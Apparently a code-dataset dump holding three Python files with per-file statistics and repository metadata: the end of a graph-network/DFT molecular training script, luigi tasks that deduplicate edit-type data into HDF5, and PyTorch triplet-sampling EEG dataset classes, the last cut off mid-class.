batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
# prediction with linear fitting
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
batch.feature)
res = res_dft+res_gcn
loss = loss_fn(res, batch.label)
mae = MAE_fn(res, batch.label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
w_mae += mae.detach().item()
w_loss += loss.detach().item()
print(f"res_dft: {res_dft}")
print(f"res_gcn: {res_gcn}")
print(f"res: {res}")
print(f"batch_label: {batch.label}")
w_mae /= idx + 1
w_loss /= idx + 1
scheduler.step(w_mae)
print("Epoch {:2d}, loss: {:.7f}, mae: {:.7f}".format(
epoch, w_loss, w_mae))
log.write("Epoch {:2d}, loss: {:.7f}, mae: {:.7f} \n".format(
epoch, w_loss, w_mae))
model.eval()
with th.no_grad():
if epoch % args.saveFreq == 0:
res_op = open(save+'/Train_res_'+str(epoch)+'.csv', 'w')
th.save(model.state_dict(), save+'/model_'+str(epoch))
for jdx, batch in enumerate(alchemy_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
batch.graph6 = batch.graph6.to(device)
batch.graph7 = batch.graph7.to(device)
batch.feature = batch.feature.to(device)
batch.dft = batch.dft.to(device)
res_dft = dft_model(batch.dft)
# new_dft = dft_model.make_features(batch.dft)
# res_dft = new_dft.mul(w_dft)
# res_dft = res_dft.sum(1)
# res_dft = res_dft.unsqueeze(1)
res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
batch.feature)
res = res_dft+res_gcn
l = batch.label.cpu().detach().numpy()
r = res.cpu().detach().numpy()
print_res(l, r, res_op)
res_op.close()
eval_gcn(model, epoch, valid_loader, 'valid', log)
eval_gcn(model, epoch, test_loader, 'test', log)
if __name__ == "__main__":
    # Command-line entry point: parse options, pick the device, and dispatch to
    # either GCN training (when a pre-trained DFT model is supplied) or DFT
    # linear-model training.
    parser = argparse.ArgumentParser()
    parser.add_argument("-M",
                        "--model",
                        help="model name (nmr,bde)",
                        default="sch")
    parser.add_argument("--epochs", help="number of epochs", default=10000)
    parser.add_argument(
        "--train_file", help="dataset for training", default="")
    parser.add_argument(
        "--valid_file", help="dataset for validation", default="")
    parser.add_argument("--test_file", help="dataset for test", default="")
    parser.add_argument("--save", help="save option", default="")
    parser.add_argument("--device", help="device", default='cuda:0')
    parser.add_argument("--saveFreq", help="save frequency",
                        type=int, default=10)
    parser.add_argument("--dft_model", help="trained dft model to be loaded",
                        type=str, default='')
    args = parser.parse_args()
    # Fall back to CPU when CUDA is unavailable.
    device = th.device(args.device if th.cuda.is_available() else 'cpu')
    # NOTE(review): the default model name "sch" is not in this list, so -M must
    # always be supplied explicitly or this assert fires.
    assert args.model in ["bde", "nmr", "literature"]
    # dataset_split("delaney.csv")
    # Portable and shell-injection-safe replacement for os.system(f'mkdir {args.save}');
    # also tolerates a pre-existing output directory.
    os.makedirs(args.save, exist_ok=True)
    if args.dft_model != '':
        # A trained DFT linear model was provided: train the GCN correction on top of it.
        train_gcn(args.model, int(args.epochs), device, args)
    else:
        train_dft(args.model, int(args.epochs), device, args)
| 40.021033
| 160
| 0.573742
| 2,602
| 20,931
| 4.436972
| 0.08186
| 0.068601
| 0.099091
| 0.019749
| 0.858987
| 0.855002
| 0.837765
| 0.822867
| 0.816631
| 0.797748
| 0
| 0.023933
| 0.301323
| 20,931
| 522
| 161
| 40.097701
| 0.765522
| 0.124457
| 0
| 0.770408
| 0
| 0.010204
| 0.068215
| 0.003726
| 0
| 0
| 0
| 0
| 0.002551
| 1
| 0.015306
| false
| 0
| 0.043367
| 0
| 0.058673
| 0.048469
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfc8484c75647deac6ed655b231b902342024638
| 68
|
py
|
Python
|
application/__init__.py
|
srcc-msu/job_statistics
|
74680a4e4c105ebcff94f089e07fcb44dbcc12d9
|
[
"MIT"
] | null | null | null |
application/__init__.py
|
srcc-msu/job_statistics
|
74680a4e4c105ebcff94f089e07fcb44dbcc12d9
|
[
"MIT"
] | null | null | null |
application/__init__.py
|
srcc-msu/job_statistics
|
74680a4e4c105ebcff94f089e07fcb44dbcc12d9
|
[
"MIT"
] | null | null | null |
from application import controllers
from application import helpers
| 22.666667
| 35
| 0.882353
| 8
| 68
| 7.5
| 0.625
| 0.5
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 36
| 34
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cfe289092694be89227ca3a014658ff30dd67b71
| 1,636
|
py
|
Python
|
tasks/collectors/edit_type.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/collectors/edit_type.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/collectors/edit_type.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
import os
import luigi
import pandas as pd
class CollectEditTypes(luigi.Task):
    """Read the final edit-type CSV, drop duplicate rows, and store it as HDF5."""

    file_name = 'revisions_with_edit_types.h5'
    data_dir = luigi.Parameter(default=r'../../data/sme')

    def output(self):
        target_path = os.path.join(self.data_dir, self.file_name)
        return luigi.LocalTarget(path=target_path)

    def run(self):
        source_path = os.path.join(self.data_dir, 'revisions_with_edit_types_final.csv')
        frame = pd.read_csv(source_path)
        if isinstance(frame, pd.DataFrame):
            frame.drop_duplicates(inplace=True)
            frame.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CollectEditTypes2012(luigi.Task):
    """Extract the 2012 edit-type frame from edit_types.h5, dedupe it, and re-save."""

    file_name = 'edit_types_2012.h5'
    data_dir = luigi.Parameter(default=r'D:\data\sme')

    def output(self):
        target_path = os.path.join(self.data_dir, self.file_name)
        return luigi.LocalTarget(path=target_path)

    def run(self):
        frame = pd.read_hdf(os.path.join(self.data_dir, 'edit_types.h5'), key='df_2012', mode='r')
        if isinstance(frame, pd.DataFrame):
            frame.drop_duplicates(inplace=True)
            frame.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CollectEditTypes2018(luigi.Task):
    """Extract the 2018 edit-type frame from edit_types.h5, dedupe it, and re-save."""

    file_name = 'edit_types_2018.h5'
    data_dir = luigi.Parameter(default=r'D:\data\sme')

    def output(self):
        target_path = os.path.join(self.data_dir, self.file_name)
        return luigi.LocalTarget(path=target_path)

    def run(self):
        frame = pd.read_hdf(os.path.join(self.data_dir, 'edit_types.h5'), key='df_2018', mode='r')
        if isinstance(frame, pd.DataFrame):
            frame.drop_duplicates(inplace=True)
            frame.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
| 35.565217
| 95
| 0.668704
| 252
| 1,636
| 4.162698
| 0.202381
| 0.080076
| 0.085796
| 0.120114
| 0.824595
| 0.824595
| 0.755005
| 0.725453
| 0.725453
| 0.725453
| 0
| 0.021658
| 0.18154
| 1,636
| 45
| 96
| 36.355556
| 0.761763
| 0
| 0
| 0.606061
| 0
| 0
| 0.113692
| 0.038509
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.090909
| 0.090909
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3225484cd17bf99da7f4facd40d8866b54764175
| 46,948
|
py
|
Python
|
PR_BCI_team/Team_StarLab/DKHan/examples/CSDG/datasets.py
|
PatternRecognition/OpenBMI
|
d9291ddb81f4319fb3764d7192e0363939a62ee9
|
[
"MIT"
] | 217
|
2015-11-02T11:10:29.000Z
|
2022-03-22T07:01:12.000Z
|
PR_BCI_team/Team_StarLab/DKHan/examples/CSDG/datasets.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 24
|
2015-11-02T11:10:45.000Z
|
2021-09-08T11:10:33.000Z
|
PR_BCI_team/Team_StarLab/DKHan/examples/CSDG/datasets.py
|
deep-bci-g/OpenBMI
|
75daf901b2dbe215852cbff243606dcfcd10f05c
|
[
"MIT"
] | 112
|
2016-01-22T01:45:44.000Z
|
2022-03-22T07:08:19.000Z
|
from __future__ import print_function
import argparse
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import numpy as np
import pickle
def windows(data, size, step):
    """Yield (start, end) index pairs of width *size*, advancing by *step*.

    Stops before any window whose end index would reach data.shape[0],
    i.e. only windows strictly inside the first axis are produced.
    """
    offset = 0
    while offset + size < data.shape[0]:
        yield int(offset), int(offset + size)
        offset += step
def segment_signal_without_transition(data, window_size, step):
    """Slice *data* into overlapping windows along axis 0.

    Windows shorter than *window_size* (a truncated tail) are discarded.
    Returns the stacked windows as a numpy array.
    """
    kept = [data[start:end]
            for start, end in windows(data, window_size, step)
            if len(data[start:end]) == window_size]
    return np.array(kept)
def segment_dataset(X, window_size, step):
    """Segment every trial (first axis of *X*) into fixed-size windows.

    Returns an array of per-trial window stacks produced by
    segment_signal_without_transition.
    """
    per_trial = [segment_signal_without_transition(X[i], window_size, step)
                 for i in range(X.shape[0])]
    return np.array(per_trial)
class TripletGiga(Dataset):
    """Triplet-sampling dataset over the GIGA EEG corpus.

    The raw arrays are regrouped into 108 subject-sessions (presumably
    54 subjects x 2 sessions — confirm against the data pipeline), then split
    per *valtype*: 'sess' (session 1 train / session 2 test), 'loso'
    (leave-one-subject-out), or 'subj' (within-subject by trial range).
    Training triplets are sampled randomly per __getitem__; evaluation
    triplets are fixed once in __init__.
    """

    def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
        # x: EEG array, assumed shape (total_trials, 1, channels, time) — TODO confirm.
        # y: labels aligned with x. sess is currently unused in this class.
        self.transform = transform
        self.istrain = istrain
        if trial is None:
            if istrain:
                self.trial = 0,200
            else:
                self.trial = 100,200 #online
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup to (108 subject-sessions, trials, 1, chans, time).
        x_data = x_data.reshape(108,-1,1,self.in_chans,self.input_time_length)
        y_data = y_data.reshape(108,-1)
        if valtype == 'sess':
            # Session split: indices 0-53 = session 1, 54-107 = session 2.
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            # Leave-one-subject-out: drop both sessions of subject *subj* from training.
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            # Within-subject split: train and test differ only by trial range.
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        # Flatten back to (samples, 1, chans, time) / (samples,).
        self.x_data = x_data.reshape(-1, 1, self.in_chans,self.input_time_length)
        self.y_data = y_data.reshape(-1)
        self.len = self.y_data.shape[0]
        self.labels_set = set(self.y_data)
        self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                 for label in self.labels_set}
        random_state = np.random.RandomState(0)
        if not istrain:
            # Fixed evaluation triplets: (anchor, same-label sample, different-label sample).
            # NOTE(review): the negative label is drawn via np.random (global state),
            # not random_state, so test triplets are only partially seeded — confirm.
            self.labels_set = set(self.y_data)
            self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                     for label in self.labels_set}
            triplets = [[i,
                         random_state.choice(self.label_to_indices[self.y_data[i].item()]),
                         random_state.choice(self.label_to_indices[
                             np.random.choice(
                                 list(self.labels_set - set([self.y_data[i].item()]))
                             )
                         ])
                         ]
                        for i in range(len(self.x_data))]
            self.test_triplets = triplets

    def __getitem__(self, index):
        # Training: draw positive (same label, different index) and negative
        # (different label) on the fly. Evaluation: use the fixed triplets.
        if self.istrain:
            img1 = self.x_data[index,:,:,:]
            y1 = self.y_data[index]
            positive_index = index
            while positive_index == index:
                positive_index = np.random.choice(self.label_to_indices[y1])
            negative_label = np.random.choice(list(self.labels_set - set([y1])))
            negative_index = np.random.choice(self.label_to_indices[negative_label])
            img2 = self.x_data[positive_index,:,:,:]
            img3 = self.x_data[negative_index,:,:,:]
            y2 = self.y_data[positive_index]
            y3 = self.y_data[negative_index]
        else:
            img1 = self.x_data[self.test_triplets[index][0],:,:,:]
            img2 = self.x_data[self.test_triplets[index][1],:,:,:]
            img3 = self.x_data[self.test_triplets[index][2],:,:,:]
            y1 = self.y_data[self.test_triplets[index][0]]
            y2 = self.y_data[self.test_triplets[index][1]]
            y3 = self.y_data[self.test_triplets[index][2]]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        return (img1, img2, img3), (y1,y2,y3)

    def __len__(self):
        return self.len
class TripletBCIC(Dataset):
    """Triplet-sampling dataset for the BCI Competition corpus (9 subjects).

    NOTE(review): apart from reshaping to 9 groups instead of 108, this class
    is a verbatim copy of TripletGiga — all the 54-based slicing in the 'sess'
    and 'loso' branches (e.g. np.s_[0:54], subj + 54) looks copy-pasted from
    the 108-group version and would index out of range with 9 groups; only the
    'subj' branch appears usable here. Confirm before relying on the other modes.
    """

    def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
        self.transform = transform
        self.istrain = istrain
        if trial is None:
            if istrain:
                self.trial = 0,200
            else:
                self.trial = 100,200 #online
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup to (9 subjects, trials, 1, chans, time).
        x_data = x_data.reshape(9,-1,1,self.in_chans,self.input_time_length)
        y_data = y_data.reshape(9,-1)
        if valtype == 'sess':
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            # Within-subject split: train and test differ only by trial range.
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        self.x_data = x_data.reshape(-1, 1, self.in_chans,self.input_time_length)
        self.y_data = y_data.reshape(-1)
        self.len = self.y_data.shape[0]
        self.labels_set = set(self.y_data)
        self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                 for label in self.labels_set}
        random_state = np.random.RandomState(0)
        if not istrain:
            # Fixed evaluation triplets: (anchor, same-label sample, different-label sample).
            self.labels_set = set(self.y_data)
            self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                     for label in self.labels_set}
            triplets = [[i,
                         random_state.choice(self.label_to_indices[self.y_data[i].item()]),
                         random_state.choice(self.label_to_indices[
                             np.random.choice(
                                 list(self.labels_set - set([self.y_data[i].item()]))
                             )
                         ])
                         ]
                        for i in range(len(self.x_data))]
            self.test_triplets = triplets

    def __getitem__(self, index):
        # Training: draw positive/negative on the fly; evaluation: fixed triplets.
        if self.istrain:
            img1 = self.x_data[index,:,:,:]
            y1 = self.y_data[index]
            positive_index = index
            while positive_index == index:
                positive_index = np.random.choice(self.label_to_indices[y1])
            negative_label = np.random.choice(list(self.labels_set - set([y1])))
            negative_index = np.random.choice(self.label_to_indices[negative_label])
            img2 = self.x_data[positive_index,:,:,:]
            img3 = self.x_data[negative_index,:,:,:]
            y2 = self.y_data[positive_index]
            y3 = self.y_data[negative_index]
        else:
            img1 = self.x_data[self.test_triplets[index][0],:,:,:]
            img2 = self.x_data[self.test_triplets[index][1],:,:,:]
            img3 = self.x_data[self.test_triplets[index][2],:,:,:]
            y1 = self.y_data[self.test_triplets[index][0]]
            y2 = self.y_data[self.test_triplets[index][1]]
            y3 = self.y_data[self.test_triplets[index][2]]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        return (img1, img2, img3), (y1,y2,y3)

    def __len__(self):
        return self.len
class TripletGiga2(Dataset):
    """Triplet dataset over GIGA with subject-aware positive/negative mining.

    Labels appear to encode both subject and task: task = label % 2 and
    subject = (label - label % 2) / 2 (see self.y_subj) — confirm against the
    label construction upstream. Positives share the task but come from a
    different subject; negatives differ in both task and subject.
    Returned labels are reduced to the task bit (y % 2).
    """

    def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
        self.transform = transform
        self.istrain = istrain
        if trial is None:
            if istrain:
                self.trial = 0,200
            else:
                self.trial = 100,200 #online
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup to (108 subject-sessions, trials, 1, chans, time).
        x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(108,-1)
        if valtype == 'sess':
            # Session split: indices 0-53 = session 1, 54-107 = session 2.
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
        self.y_data = y_data.reshape(-1)
        # Subject id recovered from the combined label (see class docstring).
        self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
        self.len = self.y_data.shape[0]
        self.labels_set = np.unique(self.y_data)
        self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                 for label in self.labels_set}
        random_state = np.random.RandomState(0)
        if not istrain:
            # Fixed evaluation triplets: (anchor, same-task/diff-subject, diff-task/diff-subject).
            self.labels_set = np.unique(self.y_data)
            self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                     for label in self.labels_set}
            triplets = [[i,
                         random_state.choice(self.label_to_indices[ # same task, diff subj
                             np.random.choice(
                                 self.labels_set[np.where(
                                     (self.labels_set % 2 == self.y_data[i] % 2) & (
                                         (self.labels_set - self.labels_set % 2) / 2 !=
                                         self.y_subj[i]), True, False)]
                             )
                         ]),
                         random_state.choice(self.label_to_indices[#diff task, diff subj
                             np.random.choice(
                                 self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2) & ((self.labels_set-self.labels_set%2)/2 != self.y_subj[i]), True,False)]
                             )
                         ])
                         ]
                        for i in range(self.len)]
            self.test_triplets = triplets

    def __getitem__(self, index):
        # Training: sample a same-task/different-subject positive and a
        # different-task/different-subject negative. Evaluation: fixed triplets.
        if self.istrain:
            img1 = self.x_data[index,:,:,:]
            y1 = self.y_data[index]
            positive_index = index
            while positive_index == index:
                positive_index = np.random.choice(self.label_to_indices[np.random.choice(
                    self.labels_set[np.where(
                        (self.labels_set % 2 == y1 % 2) & (
                            (self.labels_set - self.labels_set % 2) / 2 !=
                            (y1-y1%2)/2), True, False)]
                )])
            negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)])
            # negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
            negative_index = np.random.choice(self.label_to_indices[negative_label])
            img2 = self.x_data[positive_index,:,:,:]
            img3 = self.x_data[negative_index,:,:,:]
            y2 = self.y_data[positive_index]
            y3 = self.y_data[negative_index]
        else:
            img1 = self.x_data[self.test_triplets[index][0],:,:,:]
            img2 = self.x_data[self.test_triplets[index][1],:,:,:]
            img3 = self.x_data[self.test_triplets[index][2],:,:,:]
            y1 = self.y_data[self.test_triplets[index][0]]
            y2 = self.y_data[self.test_triplets[index][1]]
            y3 = self.y_data[self.test_triplets[index][2]]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        # Labels collapsed to the task bit.
        return (img1, img2, img3), (y1%2,y2%2,y3%2)

    def __len__(self):
        return self.len
class TripletGigaDA(Dataset):
    """Domain-adaptation triplet dataset: anchors from a target subject,
    positive/negative samples from a source subject.

    Only valtype == 'subj' is supported; anything else raises AssertionError.
    __getitem__ crops the time axis to samples 100:500 — presumably the
    post-stimulus window; confirm against the preprocessing pipeline.
    """

    def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj_s=None, trial_s=None, subj_t=None, trial_t=None):
        # subj_s/trial_s select the source pool, subj_t/trial_t the target pool.
        self.transform = transform
        self.istrain = istrain
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup to (108 subject-sessions, trials, 1, chans, time).
        x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(108, -1)
        # source
        self.trial_s = trial_s
        if valtype == 'subj':
            if subj_s is None:
                raise AssertionError()
            x_data_s = x_data[subj_s, self.trial_s[0]:self.trial_s[1], :, :, :]
            y_data_s = y_data[subj_s, self.trial_s[0]:self.trial_s[1]]
        else:
            raise AssertionError()
        self.x_data_s = x_data_s.reshape(-1, 1, self.in_chans, self.input_time_length)
        self.y_data_s = y_data_s.reshape(-1)
        # self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
        #target
        self.trial_t = trial_t
        if valtype == 'subj':
            if subj_t is None:
                raise AssertionError()
            x_data_t = x_data[subj_t, self.trial_t[0]:self.trial_t[1], :, :, :]
            y_data_t = y_data[subj_t, self.trial_t[0]:self.trial_t[1]]
        else:
            raise AssertionError()
        self.x_data_t = x_data_t.reshape(-1, 1, self.in_chans, self.input_time_length)
        self.y_data_t = y_data_t.reshape(-1)
        # Dataset length follows the target pool; lookups index the source pool.
        self.len = self.y_data_t.shape[0]
        self.labels_set = np.unique(self.y_data_s)
        self.label_to_indices = {label: np.where(self.y_data_s == label)[0]
                                 for label in self.labels_set}
        # NOTE(review): random_state is created but never used in this class.
        random_state = np.random.RandomState(0)

    def __getitem__(self, index):
        # Anchor from the target subject; positive = same task / different
        # subject, negative = different task / different subject, both drawn
        # from the source pool. Time axis cropped to 100:500.
        img1 = self.x_data_t[index,:,:,100:500]
        y1 = self.y_data_t[index]
        positive_index = index
        while positive_index == index:
            positive_index = np.random.choice(self.label_to_indices[np.random.choice(
                self.labels_set[np.where(
                    (self.labels_set % 2 == y1 % 2) & (
                        (self.labels_set - self.labels_set % 2) / 2 !=
                        (y1-y1%2)/2), True, False)]
            )])
        negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)])
        # negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
        negative_index = np.random.choice(self.label_to_indices[negative_label])
        img2 = self.x_data_s[positive_index,:,:,100:500]
        img3 = self.x_data_s[negative_index,:,:,100:500]
        y2 = self.y_data_s[positive_index]
        y3 = self.y_data_s[negative_index]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        # Labels collapsed to the task bit.
        return (img1, img2, img3), (y1%2,y2%2,y3%2)

    def __len__(self):
        return self.len
class TripletGiga3(Dataset):
    """Variant of TripletGiga2 that restricts positive/negative mining to a
    hand-picked list of "BCI-excellent" subjects.

    The bci_excellent indices (presumably high-performing subjects — confirm
    against the study) are expanded to both sessions (+54) and both task
    labels (*2, *2+1), then intersected with the labels actually present.
    __getitem__ crops the time axis to 100:500 and returns task-bit labels.
    """

    def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
        self.transform = transform
        self.istrain = istrain
        if trial is None:
            if istrain:
                self.trial = 0,200
            else:
                self.trial = 100,200 #online
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup to (108 subject-sessions, trials, 1, chans, time).
        x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(108,-1)
        if valtype == 'sess':
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
